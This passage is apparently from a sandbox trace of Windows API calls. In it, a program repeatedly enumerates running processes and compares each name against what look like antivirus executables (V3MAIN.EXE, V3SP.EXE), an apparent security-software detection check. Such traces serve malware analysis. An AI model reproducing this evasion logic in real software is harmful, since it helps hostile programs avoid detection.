lpString2="V3MAIN.EXE") returned -1 [0163.356] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.357] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.357] lstrlenW (lpString="conhost.exe") returned 11 [0163.357] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.357] lstrcmpW (lpString1="CONHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.357] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.357] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.357] lstrlenW (lpString="PING.EXE") returned 8 [0163.357] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.357] lstrcmpW (lpString1="PING.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.357] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.358] CloseHandle (hObject=0xe0) returned 1 [0163.358] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.359] lstrcpyW (in: lpString1=0x18f8e4, lpString2="V3SP.EXE" | out: lpString1="V3SP.EXE") returned="V3SP.EXE" [0163.359] lstrlenW (lpString="V3SP.EXE") returned 8 [0163.359] CharUpperBuffW (in: lpsz="V3SP.EXE", cchLength=0x8 | out: lpsz="V3SP.EXE") returned 0x8 
[0163.359] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.360] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.360] lstrlenW (lpString="[System Process]") returned 16 [0163.360] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.360] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="V3SP.EXE") returned -1 [0163.360] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.360] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.360] lstrlenW (lpString="System") returned 6 [0163.360] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.360] lstrcmpW (lpString1="SYSTEM", lpString2="V3SP.EXE") returned -1 [0163.360] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.361] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.361] lstrlenW (lpString="smss.exe") returned 8 [0163.361] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.361] lstrcmpW (lpString1="SMSS.EXE", lpString2="V3SP.EXE") returned -1 [0163.361] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: 
lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.361] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.362] lstrlenW (lpString="csrss.exe") returned 9 [0163.362] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.362] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3SP.EXE") returned -1 [0163.362] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.362] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.362] lstrlenW (lpString="wininit.exe") returned 11 [0163.362] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.362] lstrcmpW (lpString1="WININIT.EXE", lpString2="V3SP.EXE") returned 1 [0163.362] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.363] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.363] lstrlenW (lpString="csrss.exe") returned 9 [0163.363] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.363] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3SP.EXE") returned -1 [0163.363] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.363] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.363] lstrlenW (lpString="winlogon.exe") returned 12 [0163.363] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.363] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="V3SP.EXE") returned 1 [0163.363] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.364] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.364] lstrlenW (lpString="services.exe") returned 12 [0163.364] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.364] lstrcmpW (lpString1="SERVICES.EXE", lpString2="V3SP.EXE") returned -1 [0163.364] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.364] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.365] lstrlenW (lpString="lsass.exe") returned 9 [0163.365] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.365] lstrcmpW (lpString1="LSASS.EXE", lpString2="V3SP.EXE") returned -1 [0163.365] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.365] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.365] lstrlenW (lpString="lsm.exe") returned 7 [0163.365] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.365] lstrcmpW (lpString1="LSM.EXE", lpString2="V3SP.EXE") returned -1 [0163.365] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.366] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.366] lstrlenW (lpString="svchost.exe") returned 11 [0163.366] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.366] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.366] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.366] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.366] lstrlenW (lpString="svchost.exe") returned 11 [0163.366] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.366] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.366] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0163.367] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.367] lstrlenW (lpString="svchost.exe") returned 11 [0163.367] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.367] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.367] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.367] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.367] lstrlenW (lpString="svchost.exe") returned 11 [0163.367] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.367] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.367] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.368] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.368] lstrlenW (lpString="svchost.exe") returned 11 [0163.368] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.368] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.368] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.368] 
lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.368] lstrlenW (lpString="audiodg.exe") returned 11 [0163.368] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.369] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="V3SP.EXE") returned -1 [0163.369] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.369] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.369] lstrlenW (lpString="svchost.exe") returned 11 [0163.369] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.369] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.369] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.370] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.370] lstrlenW (lpString="svchost.exe") returned 11 [0163.370] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.370] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.370] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.371] lstrcpyW (in: lpString1=0x18f6dc, 
lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.371] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.371] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.371] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="V3SP.EXE") returned -1 [0163.371] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.371] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.371] lstrlenW (lpString="svchost.exe") returned 11 [0163.371] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.371] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.371] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.372] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.372] lstrlenW (lpString="taskhost.exe") returned 12 [0163.372] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.372] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.372] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.373] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: 
lpString1="taskeng.exe") returned="taskeng.exe" [0163.373] lstrlenW (lpString="taskeng.exe") returned 11 [0163.373] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.373] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3SP.EXE") returned -1 [0163.373] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.374] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.374] lstrlenW (lpString="dwm.exe") returned 7 [0163.374] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.374] lstrcmpW (lpString1="DWM.EXE", lpString2="V3SP.EXE") returned -1 [0163.374] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.375] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.375] lstrlenW (lpString="explorer.exe") returned 12 [0163.375] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.375] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="V3SP.EXE") returned -1 [0163.375] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.375] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.375] lstrlenW 
(lpString="taskeng.exe") returned 11 [0163.375] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.376] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3SP.EXE") returned -1 [0163.376] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.376] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.376] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.376] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.376] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="V3SP.EXE") returned -1 [0163.376] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.377] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.377] lstrlenW (lpString="taskhost.exe") returned 12 [0163.377] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.377] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.377] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.378] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.378] 
lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.378] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.378] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="V3SP.EXE") returned -1 [0163.378] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.378] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.378] lstrlenW (lpString="tri.exe") returned 7 [0163.379] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.379] lstrcmpW (lpString1="TRI.EXE", lpString2="V3SP.EXE") returned -1 [0163.379] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.379] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.379] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.379] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.379] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="V3SP.EXE") returned -1 [0163.379] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.380] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: 
lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.380] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.380] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.380] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="V3SP.EXE") returned -1 [0163.380] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.381] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.381] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.381] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.381] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="V3SP.EXE") returned -1 [0163.381] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.381] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.381] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.382] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.382] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="V3SP.EXE") returned -1 [0163.382] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.382] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.382] lstrlenW (lpString="isolation.exe") returned 13 [0163.382] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.382] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="V3SP.EXE") returned -1 [0163.382] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.383] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.383] lstrlenW (lpString="abc.exe") returned 7 [0163.383] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.383] lstrcmpW 